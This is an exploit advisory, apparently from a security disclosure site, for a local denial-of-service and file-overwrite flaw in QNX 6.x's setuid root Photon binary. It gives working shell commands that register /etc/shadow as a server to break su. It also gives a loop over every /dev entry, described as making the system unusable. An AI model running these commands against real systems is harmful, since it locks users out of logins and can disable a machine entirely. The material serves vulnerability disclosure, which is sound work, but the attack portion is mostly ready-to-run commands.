QNX 6.x Photon Denial Of Service / File Overwrite

2014.03.10
Credit: cenobyte
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# # QNX 6.x Photon denial of service vulnerability by cenobyte 2013 # <vincitamorpatriae@gmail.com> # # - vulnerability description: # QNX setuid root /usr/photon/bin/Photon allows users to create new servers with # arbitrary filenames registered with the -N parameter. # Photon does not check whether files exist and/or the owner of the ile is the # same as the user. Thus any user can create a new server with a filename such # as /etc/shadow resulting in a denial of service attack. # # - vulnerable platforms: # QNX 6.5.0SP1 # QNX 6.5.0 # QNX 6.4.1 # QNX 6.3.0 # QNX 6.2.0 $ id uid=100(user) gid=100 $ /usr/photon/bin/Photon -N /etc/shadow $ su - su error: Password and Shadow files on different devices $ ps -edaf | grep Photon 100 4524851 4520182 - Oct26 ? 00:00:00 /usr/photon/bin/Photon -N /etc/shadow $ kill -9 4524851 $ su - password: Sat Oct 26 13:22:38 2013 on /dev/ttyp1 Last login: Sat Oct 26 02:43:08 2013 on /dev/ttyp1 edit the file .profile if you want to change your environment. To start the Photon windowing environment, type "ph". # If you want to make the system unusable: $ for x in $(ls /dev); do /usr/photon/bin/Photon -N "/dev/$x"; done


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top